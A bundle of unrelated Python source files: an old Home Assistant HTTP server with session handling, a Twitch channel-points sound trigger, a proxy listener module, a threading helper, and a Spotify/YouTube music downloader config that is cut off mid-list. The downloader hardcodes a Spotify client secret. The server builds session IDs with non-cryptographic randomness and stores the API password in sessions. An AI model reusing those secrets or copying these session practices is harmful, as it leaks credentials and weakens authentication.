server_port = config[DOMAIN].get(CONF_SERVER_PORT, SERVER_PORT)
development = str(config[DOMAIN].get(CONF_DEVELOPMENT, "")) == "1"
sessions_enabled = config[DOMAIN].get(CONF_SESSIONS_ENABLED, True)
server = HomeAssistantHTTPServer(
(server_host, server_port), RequestHandler, hass, api_password,
development, no_password_set, sessions_enabled)
hass.bus.listen_once(
ha.EVENT_HOMEASSISTANT_START,
lambda event:
threading.Thread(target=server.start, daemon=True).start())
hass.http = server
hass.config.api = rem.API(util.get_local_ip(), api_password, server_port)
return True
# pylint: disable=too-many-instance-attributes
class HomeAssistantHTTPServer(ThreadingMixIn, HTTPServer):
""" Handle HTTP requests in a threaded fashion. """
# pylint: disable=too-few-public-methods
allow_reuse_address = True
daemon_threads = True
# pylint: disable=too-many-arguments
def __init__(self, server_address, request_handler_class,
hass, api_password, development, no_password_set,
sessions_enabled):
super().__init__(server_address, request_handler_class)
self.server_address = server_address
self.hass = hass
self.api_password = api_password
self.development = development
self.no_password_set = no_password_set
self.paths = []
self.sessions = SessionStore(sessions_enabled)
# We will lazy init this one if needed
self.event_forwarder = None
if development:
_LOGGER.info("running http in development mode")
def start(self):
""" Starts the server. """
self.hass.bus.listen_once(
ha.EVENT_HOMEASSISTANT_STOP,
lambda event: self.shutdown())
_LOGGER.info(
"Starting web interface at http://%s:%d", *self.server_address)
# 31-1-2015: Refactored frontend/api components out of this component
# To prevent stuff from breaking, load the two extracted components
bootstrap.setup_component(self.hass, 'api')
bootstrap.setup_component(self.hass, 'frontend')
self.serve_forever()
def register_path(self, method, url, callback, require_auth=True):
""" Regitsters a path wit the server. """
self.paths.append((method, url, callback, require_auth))
# pylint: disable=too-many-public-methods,too-many-locals
class RequestHandler(SimpleHTTPRequestHandler):
"""
Handles incoming HTTP requests
We extend from SimpleHTTPRequestHandler instead of Base so we
can use the guess content type methods.
"""
server_version = "HomeAssistant/1.0"
def __init__(self, req, client_addr, server):
""" Contructor, call the base constructor and set up session """
self._session = None
SimpleHTTPRequestHandler.__init__(self, req, client_addr, server)
def _handle_request(self, method): # pylint: disable=too-many-branches
""" Does some common checks and calls appropriate method. """
url = urlparse(self.path)
# Read query input
data = parse_qs(url.query)
# parse_qs gives a list for each value, take the latest element
for key in data:
data[key] = data[key][-1]
# Did we get post input ?
content_length = int(self.headers.get(HTTP_HEADER_CONTENT_LENGTH, 0))
if content_length:
body_content = self.rfile.read(content_length).decode("UTF-8")
try:
data.update(json.loads(body_content))
except (TypeError, ValueError):
# TypeError if JSON object is not a dict
# ValueError if we could not parse JSON
_LOGGER.exception(
"Exception parsing JSON: %s", body_content)
self.write_json_message(
"Error parsing JSON", HTTP_UNPROCESSABLE_ENTITY)
return
self._session = self.get_session()
if self.server.no_password_set:
api_password = self.server.api_password
else:
api_password = self.headers.get(HTTP_HEADER_HA_AUTH)
if not api_password and DATA_API_PASSWORD in data:
api_password = data[DATA_API_PASSWORD]
if not api_password and self._session is not None:
api_password = self._session.cookie_values.get(
CONF_API_PASSWORD)
if '_METHOD' in data:
method = data.pop('_METHOD')
# Var to keep track if we found a path that matched a handler but
# the method was different
path_matched_but_not_method = False
# Var to hold the handler for this path and method if found
handle_request_method = False
require_auth = True
# Check every handler to find matching result
for t_method, t_path, t_handler, t_auth in self.server.paths:
# we either do string-comparison or regular expression matching
# pylint: disable=maybe-no-member
if isinstance(t_path, str):
path_match = url.path == t_path
else:
path_match = t_path.match(url.path)
if path_match and method == t_method:
# Call the method
handle_request_method = t_handler
require_auth = t_auth
break
elif path_match:
path_matched_but_not_method = True
# Did we find a handler for the incoming request?
if handle_request_method:
# For some calls we need a valid password
if require_auth and api_password != self.server.api_password:
self.write_json_message(
"API password missing or incorrect.", HTTP_UNAUTHORIZED)
else:
if self._session is None and require_auth:
self._session = self.server.sessions.create(
api_password)
handle_request_method(self, path_match, data)
elif path_matched_but_not_method:
self.send_response(HTTP_METHOD_NOT_ALLOWED)
self.end_headers()
else:
self.send_response(HTTP_NOT_FOUND)
self.end_headers()
def do_HEAD(self): # pylint: disable=invalid-name
""" HEAD request handler. """
self._handle_request('HEAD')
def do_GET(self): # pylint: disable=invalid-name
""" GET request handler. """
self._handle_request('GET')
def do_POST(self): # pylint: disable=invalid-name
""" POST request handler. """
self._handle_request('POST')
def do_PUT(self): # pylint: disable=invalid-name
""" PUT request handler. """
self._handle_request('PUT')
def do_DELETE(self): # pylint: disable=invalid-name
""" DELETE request handler. """
self._handle_request('DELETE')
def write_json_message(self, message, status_code=HTTP_OK):
""" Helper method to return a message to the caller. """
self.write_json({'message': message}, status_code=status_code)
def write_json(self, data=None, status_code=HTTP_OK, location=None):
""" Helper method to return JSON to the caller. """
self.send_response(status_code)
self.send_header(HTTP_HEADER_CONTENT_TYPE, CONTENT_TYPE_JSON)
if location:
self.send_header('Location', location)
self.set_session_cookie_header()
self.end_headers()
if data is not None:
self.wfile.write(
json.dumps(data, indent=4, sort_keys=True,
cls=rem.JSONEncoder).encode("UTF-8"))
def write_file(self, path):
""" Returns a file to the user. """
try:
with open(path, 'rb') as inp:
self.write_file_pointer(self.guess_type(path), inp)
except IOError:
self.send_response(HTTP_NOT_FOUND)
self.end_headers()
_LOGGER.exception("Unable to serve %s", path)
def write_file_pointer(self, content_type, inp):
"""
Helper function to write a file pointer to the user.
Does not do error handling.
"""
do_gzip = 'gzip' in self.headers.get(HTTP_HEADER_ACCEPT_ENCODING, '')
self.send_response(HTTP_OK)
self.send_header(HTTP_HEADER_CONTENT_TYPE, content_type)
self.set_cache_header()
self.set_session_cookie_header()
if do_gzip:
gzip_data = gzip.compress(inp.read())
self.send_header(HTTP_HEADER_CONTENT_ENCODING, "gzip")
self.send_header(HTTP_HEADER_VARY, HTTP_HEADER_ACCEPT_ENCODING)
self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(len(gzip_data)))
else:
fst = os.fstat(inp.fileno())
self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(fst[6]))
self.end_headers()
if self.command == 'HEAD':
return
elif do_gzip:
self.wfile.write(gzip_data)
else:
self.copyfile(inp, self.wfile)
def set_cache_header(self):
""" Add cache headers if not in development """
if not self.server.development:
# 1 year in seconds
cache_time = 365 * 86400
self.send_header(
HTTP_HEADER_CACHE_CONTROL,
"public, max-age={}".format(cache_time))
self.send_header(
HTTP_HEADER_EXPIRES,
self.date_time_string(time.time()+cache_time))
def set_session_cookie_header(self):
""" Add the header for the session cookie """
if self.server.sessions.enabled and self._session is not None:
existing_sess_id = self.get_current_session_id()
if existing_sess_id != self._session.session_id:
self.send_header(
'Set-Cookie',
SESSION_KEY+'='+self._session.session_id)
def get_session(self):
""" Get the requested session object from cookie value """
if self.server.sessions.enabled is not True:
return None
session_id = self.get_current_session_id()
if session_id is not None:
session = self.server.sessions.get(session_id)
if session is not None:
session.reset_expiry()
return session
return None
def get_current_session_id(self):
"""
Extracts the current session id from the
cookie or returns None if not set
"""
cookie = cookies.SimpleCookie()
if self.headers.get('Cookie', None) is not None:
cookie.load(self.headers.get("Cookie"))
if cookie.get(SESSION_KEY, False):
return cookie[SESSION_KEY].value
return None
class ServerSession:
""" A very simple session class """
def __init__(self, session_id):
""" Set up the expiry time on creation """
self._expiry = 0
self.reset_expiry()
self.cookie_values = {}
self.session_id = session_id
def reset_expiry(self):
""" Resets the expiry based on current time """
self._expiry = date_util.utcnow() + timedelta(
seconds=SESSION_TIMEOUT_SECONDS)
@property
def is_expired(self):
""" Return true if the session is expired based on the expiry time """
return self._expiry < date_util.utcnow()
class SessionStore:
""" Responsible for storing and retrieving http sessions """
def __init__(self, enabled=True):
""" Set up the session store """
self._sessions = {}
self.enabled = enabled
self.session_lock = threading.RLock()
@Throttle(MIN_SEC_SESSION_CLEARING)
def remove_expired(self):
""" Remove any expired sessions. """
if self.session_lock.acquire(False):
try:
keys = []
for key in self._sessions.keys():
keys.append(key)
for key in keys:
if self._sessions[key].is_expired:
del self._sessions[key]
_LOGGER.info("Cleared expired session %s", key)
finally:
self.session_lock.release()
def add(self, key, session):
""" Add a new session to the list of tracked sessions """
self.remove_expired()
with self.session_lock:
self._sessions[key] = session
def get(self, key):
""" get a session by key """
self.remove_expired()
session = self._sessions.get(key, None)
if session is not None and session.is_expired:
return None
return session
def create(self, api_password):
""" Creates a new session and adds it to the sessions """
if self.enabled is not True:
return None
chars = string.ascii_letters + string.digits
session_id = ''.join([random.choice(chars) for i in range(20)])
session = ServerSession(session_id)
session.cookie_values[CONF_API_PASSWORD] = api_password
self.add(session_id, session)
return session
|
ChannelPointsSFXTrigger_StreamlabsSystem.py
|
# -*- coding: utf-8 -*-
#---------------------------
# Import Libraries
#---------------------------
import clr, codecs, json, os, re, sys, threading, datetime
clr.AddReference("IronPython.Modules.dll")
clr.AddReferenceToFileAndPath(os.path.join(os.path.dirname(os.path.realpath(__file__)) + "\References", "TwitchLib.PubSub.dll"))
from TwitchLib.PubSub import TwitchPubSub
#---------------------------
# [Required] Script Information
#---------------------------
ScriptName = "Twitch Channel Points SFX Trigger"
Website = "https://www.twitch.tv/EncryptedThoughts"
Description = "Script to trigger SFX on channel point reward redemptions."
Creator = "EncryptedThoughts"
Version = "1.0.0.0"
#---------------------------
# Define Global Variables
#---------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMe = os.path.join(os.path.dirname(__file__), "README.txt")
EventReceiver = None
ThreadQueue = []
CurrentThread = None
PlayNextAt = datetime.datetime.now()
#---------------------------------------
# Classes
#---------------------------------------
class Settings(object):
def __init__(self, SettingsFile=None):
if SettingsFile and os.path.isfile(SettingsFile):
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
else:
self.EnableDebug = False
self.Username = ""
self.TwitchReward1Name = ""
self.SFX1Path = ""
self.SFX1Volume = 100
self.SFX1Delay = 10
self.TwitchReward2Name = ""
self.SFX2Path = ""
self.SFX2Volume = 100
self.SFX2Delay = 10
self.TwitchReward3Name = ""
self.SFX3Path = ""
self.SFX3Volume = 100
self.SFX3Delay = 10
self.TwitchReward4Name = ""
self.SFX4Path = ""
self.SFX4Volume = 100
self.SFX4Delay = 10
self.TwitchReward5Name = ""
self.SFX5Path = ""
self.SFX5Volume = 100
self.SFX5Delay = 10
def Reload(self, jsondata):
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
def Save(self, SettingsFile):
try:
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8")
with codecs.open(SettingsFile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8')))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
return
#---------------------------
# [Required] Initialize Data (Only called on load)
#---------------------------
def Init():
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
ScriptSettings.Save(SettingsFile)
## Init the Streamlabs Event Receiver
Start()
return
def Start():
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Starting receiver");
global EventReceiver
EventReceiver = TwitchPubSub()
EventReceiver.OnPubSubServiceConnected += EventReceiverConnected
EventReceiver.OnListenResponse += EventReceiverListenResponse
EventReceiver.OnRewardRedeemed += EventReceiverRewardRedeemed
EventReceiver.Connect()
def EventReceiverConnected(sender, e):
#get channel id for username
headers = { 'Client-ID': 'icyqwwpy744ugu5x4ymyt6jqrnpxso' }
result = json.loads(Parent.GetRequest("https://api.twitch.tv/helix/users?login=" + ScriptSettings.Username,headers))
user = json.loads(result["response"])
id = user["data"][0]["id"]
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Event receiver connected, sending topics for channel id: " + id);
EventReceiver.ListenToRewards(id)
EventReceiver.SendTopics()
return
def EventReceiverListenResponse(sender, e):
if ScriptSettings.EnableDebug:
if e.Successful:
Parent.Log(ScriptName, "Successfully verified listening to topic: " + e.Topic);
else:
Parent.Log(ScriptName, "Failed to listen! Error: " + e.Response.Error);
return
def EventReceiverRewardRedeemed(sender, e):
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Event triggered")
if e.RewardTitle == ScriptSettings.TwitchReward1Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX1Path, ScriptSettings.SFX1Volume, ScriptSettings.SFX1Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward2Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX2Path, ScriptSettings.SFX2Volume, ScriptSettings.SFX2Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward3Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX3Path, ScriptSettings.SFX3Volume, ScriptSettings.SFX3Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward4Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX4Path, ScriptSettings.SFX4Volume, ScriptSettings.SFX4Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward5Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX5Path, ScriptSettings.SFX5Volume, ScriptSettings.SFX5Delay,)))
return
def RewardRedeemedWorker(path, volume, delay):
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, path + " " + str(volume) + " " + str(delay))
Parent.PlaySound(path, volume/100)
global PlayNextAt
PlayNextAt = datetime.datetime.now() + datetime.timedelta(0, delay)
#---------------------------
# [Required] Execute Data / Process messages
#---------------------------
def Execute(data):
return
#---------------------------
# [Required] Tick method (Gets called during every iteration even when there is no incoming data)
#---------------------------
def Tick():
global PlayNextAt
if PlayNextAt > datetime.datetime.now():
return
global CurrentThread
if CurrentThread and CurrentThread.isAlive() == False:
CurrentThread = None
if CurrentThread == None and len(ThreadQueue) > 0:
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Starting new thread. " + str(PlayNextAt))
CurrentThread = ThreadQueue.pop(0)
CurrentThread.start()
return
#---------------------------
# [Optional] Parse method (Allows you to create your own custom $parameters)
#---------------------------
def Parse(parseString, userid, username, targetid, targetname, message):
return parseString
#---------------------------
# [Optional] Reload Settings (Called when a user clicks the Save Settings button in the Chatbot UI)
#---------------------------
def ReloadSettings(jsonData):
# Execute json reloading here
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Saving settings.")
global EventReceiver
try:
if EventReceiver:
EventReceiver.Disconnect()
ScriptSettings.__dict__ = json.loads(jsonData)
ScriptSettings.Save(SettingsFile)
EventReceiver = None
Start()
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Settings saved successfully")
except Exception as e:
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, str(e))
return
#---------------------------
# [Optional] Unload (Called when a user reloads their scripts or closes the bot / cleanup stuff)
#---------------------------
def Unload():
# Disconnect EventReceiver cleanly
try:
if EventReceiver:
EventReceiver.Disconnect()
except:
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Event receiver already disconnected")
return
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
return
def openreadme():
os.startfile(ReadMe)
|
ProxyListener.py
|
import socket
import socketserver
import threading
import sys
import glob
import time
import importlib
import queue
import select
import logging
import ssl
from OpenSSL import SSL
from .ssl_utils import ssl_detector
from . import *
import os
BUF_SZ = 1024
class ProxyListener(object):
def __init__(
self,
config={},
name='ProxyListener',
logging_level=logging.DEBUG,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = config.get('ipaddr')
self.server = None
self.udp_fwd_table = dict()
self.logger.debug('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.items():
self.logger.debug(' %10s: %s', key, value)
def start(self):
proto = self.config.get('protocol').upper()
if proto != None:
if proto == 'TCP':
self.logger.debug('Starting TCP ...')
self.server = ThreadedTCPServer((self.local_ip,
int(self.config.get('port'))), ThreadedTCPRequestHandler)
elif proto == 'UDP':
self.logger.debug('Starting UDP ...')
self.server = ThreadedUDPServer((self.local_ip,
int(self.config.get('port'))), ThreadedUDPRequestHandler)
self.server.fwd_table = self.udp_fwd_table
else:
self.logger.error('Unknown protocol %s' % proto)
return
else:
self.logger.error('Protocol is not defined')
return
self.server.config = self.config
self.server.logger = self.logger
self.server.local_ip = self.local_ip
if self.local_ip == '0.0.0.0':
self.server.local_ip = 'localhost'
self.server.running_listeners = None
self.server.diverter = None
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
server_ip, server_port = self.server.server_address
self.logger.debug("%s Server(%s:%d) thread: %s" % (proto, server_ip,
server_port, self.server_thread.name))
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
def acceptListeners(self, listeners):
self.server.listeners = listeners
def acceptDiverter(self, diverter):
self.server.diverter = diverter
class ThreadedTCPClientSocket(threading.Thread):
def __init__(self, ip, port, listener_q, remote_q, config, log):
super(ThreadedTCPClientSocket, self).__init__()
self.ip = ip
self.port = int(port)
self.listener_q = listener_q
self.remote_q = remote_q
self.config = config
self.logger = log
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
try:
self.sock.connect((self.ip, self.port))
while True:
readable, writable, exceptional = select.select([self.sock],
[], [], .001)
if not self.remote_q.empty():
data = self.remote_q.get()
self.sock.send(data)
if readable:
data = self.sock.recv(BUF_SZ)
if data:
self.listener_q.put(data)
else:
self.sock.close()
exit(1)
except Exception as e:
self.logger.debug('Listener socket exception %s' % e.message)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
daemon_threads = True
def get_top_listener(config, data, listeners, diverter, orig_src_ip,
orig_src_port, proto):
top_listener = None
top_confidence = 0
dport = diverter.getOriginalDestPort(orig_src_ip, orig_src_port, proto)
for listener in listeners:
try:
confidence = listener.taste(data, dport)
if confidence > top_confidence:
top_confidence = confidence
top_listener = listener
except:
# Exception occurs if taste() is not implemented for this listener
pass
return top_listener
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
remote_sock = self.request
# queue for data received from the listener
listener_q = queue.Queue()
# queue for data received from remote
remote_q = queue.Queue()
data = None
ssl_remote_sock = None
keyfile_path = 'listeners/ssl_utils/privkey.pem'
keyfile_path = ListenerBase.abs_config_path(keyfile_path)
if keyfile_path is None:
self.logger.error('Could not locate %s', keyfile_path)
sys.exit(1)
certfile_path = 'listeners/ssl_utils/server.pem'
certfile_path = ListenerBase.abs_config_path(certfile_path)
if certfile_path is None:
self.logger.error('Could not locate %s', certfile_path)
sys.exit(1)
ssl_version = ssl.PROTOCOL_SSLv23
try:
data = remote_sock.recv(BUF_SZ, socket.MSG_PEEK)
self.server.logger.debug('Received %d bytes.', len(data))
self.server.logger.debug('%s', '-'*80,)
for line in hexdump_table(data):
self.server.logger.debug(line)
self.server.logger.debug('%s', '-'*80,)
except Exception as e:
self.server.logger.warning('recv() error: %s' % e.message)
if data:
if ssl_detector.looks_like_ssl(data):
self.server.logger.debug('SSL detected')
ssl_remote_sock = ssl.wrap_socket(
remote_sock,
server_side=True,
do_handshake_on_connect=True,
certfile=certfile_path,
ssl_version=ssl_version,
keyfile=keyfile_path )
data = ssl_remote_sock.recv(BUF_SZ)
orig_src_ip = self.client_address[0]
orig_src_port = self.client_address[1]
top_listener = get_top_listener(self.server.config, data,
self.server.listeners, self.server.diverter,
orig_src_ip, orig_src_port, 'TCP')
if top_listener:
self.server.logger.debug('Likely listener: %s' %
top_listener.name)
listener_sock = ThreadedTCPClientSocket(self.server.local_ip,
top_listener.port, listener_q, remote_q,
self.server.config, self.server.logger)
listener_sock.daemon = True
listener_sock.start()
remote_sock.setblocking(0)
# ssl has no 'peek' option, so we need to process the first
# packet that is already consumed from the socket
if ssl_remote_sock:
ssl_remote_sock.setblocking(0)
remote_q.put(data)
while True:
readable, writable, exceptional = select.select(
[remote_sock], [], [], .001)
if readable:
try:
if ssl_remote_sock:
data = ssl_remote_sock.recv(BUF_SZ)
else:
data = remote_sock.recv(BUF_SZ)
if data:
remote_q.put(data)
else:
self.server.logger.debug(
'Closing remote socket connection')
return
except Exception as e:
self.server.logger.debug('Remote Connection terminated')
return
if not listener_q.empty():
data = listener_q.get()
if ssl_remote_sock:
ssl_remote_sock.send(data)
else:
remote_sock.send(data)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0]
remote_sock = self.request[1]
self.server.logger.debug('Received UDP packet from %s.' %
self.client_address[0])
if data:
self.server.logger.debug('Received %d bytes.', len(data))
self.server.logger.debug('%s', '-'*80,)
for line in hexdump_table(data):
self.server.logger.debug(line)
self.server.logger.debug('%s', '-'*80,)
orig_src_ip = self.client_address[0]
orig_src_port = self.client_address[1]
top_listener = get_top_listener(self.server.config, data,
self.server.listeners, self.server.diverter,
orig_src_ip, orig_src_port, 'UDP')
if top_listener:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.server.local_ip, 0))
sock.sendto(data, (self.server.local_ip, int(top_listener.port)))
reply = sock.recv(BUF_SZ)
self.server.logger.debug('Received %d bytes.', len(data))
sock.close()
remote_sock.sendto(reply, (orig_src_ip, int(orig_src_port)))
else:
self.server.logger.debug('No packet data')
def hexdump_table(data, length=16):
hexdump_lines = []
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_line = ' '.join(["%02X" % ord(b) for b in chunk ] )
ascii_line = ''.join([b if ord(b) > 31 and ord(b) < 127 else '.' for b in chunk ] )
hexdump_lines.append("%04X: %-*s %s" % (i, length*3, hex_line, ascii_line ))
return hexdump_lines
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s',
datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
global listeners
listeners = load_plugins()
TCP_server = ThreadedTCPServer((sys.argv[1], int(sys.argv[2])),
ThreadedTCPRequestHandler)
TCP_server_thread = threading.Thread(target=TCP_server.serve_forever)
TCP_server_thread.daemon = True
TCP_server_thread.start()
tcp_server_ip, tcp_server_port = TCP_server.server_address
logger.debug("TCP Server(%s:%d) thread: %s" % (tcp_server_ip,
tcp_server_port, TCP_server_thread.name))
try:
while True:
time.sleep(.001)
except Exception as e:
logger.info(e)
TCP_server.shutdown()
finally:
logger.debug('Closing ProxyListener')
exit(1)
logger.debug('Exiting')
TCP_server.shutdown()
if __name__ == '__main__':
main()
|
tools.py
|
import threading
def concurrent(func):
'''
For functions that end but need to run concurrently
:param func:
:return:
'''
def decorator(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.start()
return decorator
|
copycat.py
|
import argparse
import json
import os
import shutil
import sys
import threading
import time
import urllib
import urllib.request
import eyed3
import requests
import spotipy
import youtube_dl
from bs4 import BeautifulSoup
from spotipy.oauth2 import SpotifyClientCredentials
configs = {
'threads': 12, # use this many downloads at once! super duper fast! consumes CPU like its cake!
'concurrent_connections': 2, # threaded spotify connections,
'download_dir': 'C:/Project/copycat/music/', # Downloaded songs go here.
'sync_download_dir': [ # Sync the downloaded songs with these directories
'G:/MUSIC/spotify/',
],
'song_selection': {
'use_filtering': False,
'edge_cases': ['remix', 'live', 'instrumental', 'cover', 'how to', 'tutorial', 'concert',
'reimagined', 'bass boost', 'boosted', 'explained', 'slowed', 'karaoke',
'datamosh', 'show', '3d', 'dance', 'unplugged', 'behind', 'festival',
'chipmunks', 'preview', 'mashup', 'feat', 'bass', 'acoustic', 'session',
' vs ', 'sings', 'grammy', 'parody', 'decoded', 'lyrics',
'performance', '8d', 'chipmunks', 'bass boosted', 'clean'],
# ignore songs that contain these words,
'min_percent_threshold': 60, # if a song title is more than 5 words, check if % if it matches
'diff_track_seconds_limit': 5, # limit duration comparision for top 2 songs
'append_search_term': '', # append some terms for search
},
'youtube_username': None, # Cant download ? try this
'youtube_password': None, # 🙈
'tag_mp3': True, # sure, why would you not?
'spotify': { # you know what
'client_id': 'ea59966691f546a38c800e765338cf31',
'client_secret': 'a99b13c2324340939cca0a6d71f91bc3'
},
'playlist': {
'spotify_parsed': [], # for internal use, dont worry
'spotify': [
[
'https://open.spotify.com/track/4yrloqLBKS7Pi3z7g2HDga?si=SFhC5k1qTLuf1ByrBlKWCA',
'https://open.spotify.com/track/5EzGOkUwkRUXYAyvjlEHah?si=iJF3_Y-zQkKAhOLkhU6ScQ',
'https://open.spotify.com/track/5rfNNdaCovygh3cxY1txTR?si=oIEDqPtERny1y0uAekcpVA',
'https://open.spotify.com/track/4qRHWM6lESs5vqNmTJrhum?si=86y-wkA8QlyMi_dz1KMIrw',
'https://open.spotify.com/track/56nziqLKNZ3METexiH6zdF?si=Dwak3g3HQNm1twoPkS-VGw',
'https://open.spotify.com/track/0mXu9RFixtjgppxSvcYcYI?si=gO2c-7gpQNm3Ny_AYfnhoQ',
'https://open.spotify.com/track/5j3iBuHq6vv7VcBo4Y2QrK?si=L1-hZJsMQBe0c2MN3MSOIA',
'https://open.spotify.com/track/40mphbjHvSisMvIAmSfpBX?si=toJPcffsSLmfG5llqbIxgw',
'https://open.spotify.com/track/5MjMvRHjOOIV6tA7OmC7mj?si=o7NtShzHRCWYoUMhMqNP4A',
'https://open.spotify.com/track/4IiZlgVMQMM7yTVsgoF4n5?si=KZC_Cuk-Qoeg6NjHd5RXmw',
'https://open.spotify.com/track/4U45aEWtQhrm8A5mxPaFZ7?si=LLmwJrYFRcuTR1w5zi_NpQ',
'https://open.spotify.com/track/1bp2IO61zbQrbWNmKKxg3f?si=ItylzUeqTmC7NtFTsZyDtw',
'https://open.spotify.com/track/1ne9wOtDF2jM6Cm8WBkaER?si=MEINsA2tTji4D73x1VYN9Q',
'https://open.spotify.com/track/4NuYhskP3cjbKPKIzjs4ui?si=q8nGZmahSzGAoBBaMrBPWA',
'https://open.spotify.com/track/37uGIrP6noERm2i7ECtMA7?si=IYBRlDyTRNKka22N7XFzNA',
'https://open.spotify.com/track/539y2n1UYiM2gyYJKGNuuQ?si=m7dUZujhTEa-YscBsLGPRg',
'https://open.spotify.com/track/3PZ0RoABbjIZhqvfFizOqa?si=BETn8jfjSF-dOWDTyDhs6A',
'https://open.spotify.com/track/5Sl4KG5rsxTN5AIvSyz5rG?si=Duhm3g9cROifEeqxV8I02w',
'https://open.spotify.com/track/26pC4BgyjdRIeieIcGqLcw?si=h5vDmkVLSDyv6Vv3A96tLQ',
'https://open.spotify.com/track/7bliRZuMFa2JmUzzNd62kk?context=spotify%3Auser%3A1230996273%3Aplaylist%3A2zsz3v4L5Y1bYrSAToUux9&si=EAHXvBu9SMmoxX5t9K_wiA',
'https://open.spotify.com/track/6w53UWYxXvQv5nU7GdNz1w?si=bbvVVdSVQLS8l-FJ3acuBQ',
'https://open.spotify.com/track/4xa0M48GDJvxClxR1t6fTf?si=QWc71ACGSqCC-LlecAMtCA',
'https://open.spotify.com/track/715fRwy0DoOnPbV6EMgcXt?si=f4htmbbBTMuQuZxz5cLoLQ',
'https://open.spotify.com/track/3jNGLTOcA4a34rZD2y392C?si=oe1jihXGQnCodM9JfKTjOA',
'https://open.spotify.com/track/3lWzVNe1yFZlkeBBzUuZYu?si=OWl1t2DLS0qTvl_Bmp1kPw',
'https://open.spotify.com/track/3bH4HzoZZFq8UpZmI2AMgV?si=ljBJWmP5Stu3mIzpfjQqrA',
'https://open.spotify.com/track/1oHLqcJbc9B7tVWlyCxq08?si=x6-9W8VrRoaNcIUWyu1R3A',
'https://open.spotify.com/track/1kLXoAje5Z4mlZOAFgZZj3?si=H2U9GP5fR6Wvy2PwSPWFKg',
'https://open.spotify.com/track/5A0sUMilD9HyM3UvMWk3zA?si=eUuvTplaQZuNvRqyn_PvEw',
'https://open.spotify.com/track/13cUO19nAPFVL1KwAsp1uK?si=YxUMcHfRRWapXC67g0drng',
'https://open.spotify.com/track/1Po2cMkzVblh10Lg3GimtJ?si=v1rbcrGRR5m_Xd8o4D1FQw',
'https://open.spotify.com/track/5QrUUrMhPi8eLKLPKEI89v?si=4PJd3WVuTgeuKvy26g9GDA',
'https://open.spotify.com/track/6nNWB2fwEbJHy7y587GV2M?si=S38KucqlQxaN2jB6Ib3nww',
'https://open.spotify.com/track/5X0kkx0LFKtRyXYPSRjdc8?si=3n9Nk7jaT_G9vrqicrsXBQ',
'https://open.spotify.com/track/5wakd1HmmslRhTcQMee8Mw?si=cpolWeUJRB-U0semhd0EIA',
'https://open.spotify.com/track/0uWHS4k3dA4w5PQszKaZOp?si=eXhTKDeFS9-mymvOmQue5Q',
'https://open.spotify.com/track/7mSmt2yar5VUXZNBV4AnpE?si=7lxcWkc0Q7iGD3ded_jLzA',
'https://open.spotify.com/track/2Qpt0DpnjmpoTAWoiHf5d8?si=0hXbXlPwSCmO72mEh201-A',
'https://open.spotify.com/track/5kgMPM2m2sGGuVL4KpHwiO?si=zSfkpL5cReGuVSdSrnfCZg',
'https://open.spotify.com/track/69L4d5HlE0YOCwWFYVFGoW?si=6JGrijMDRtaJSOFZX2L89w',
'https://open.spotify.com/track/11bD1JtSjlIgKgZG2134DZ?si=c-QGEeiVSJ6okb0YuqSNXw',
'https://open.spotify.com/track/4iaGeV4WFvP2ynbqCIyTpS?si=q3kz2QI2RTC03hJTO18kig',
'https://open.spotify.com/track/257SoE95qEweGItCB9Q5rE?si=DzVamVAPRh2AnPDpGuJmNg',
'https://open.spotify.com/track/40RaUosMp8ROAFVeqrKZGw?si=5eCFlK_kTPuxeoNIkteUYA',
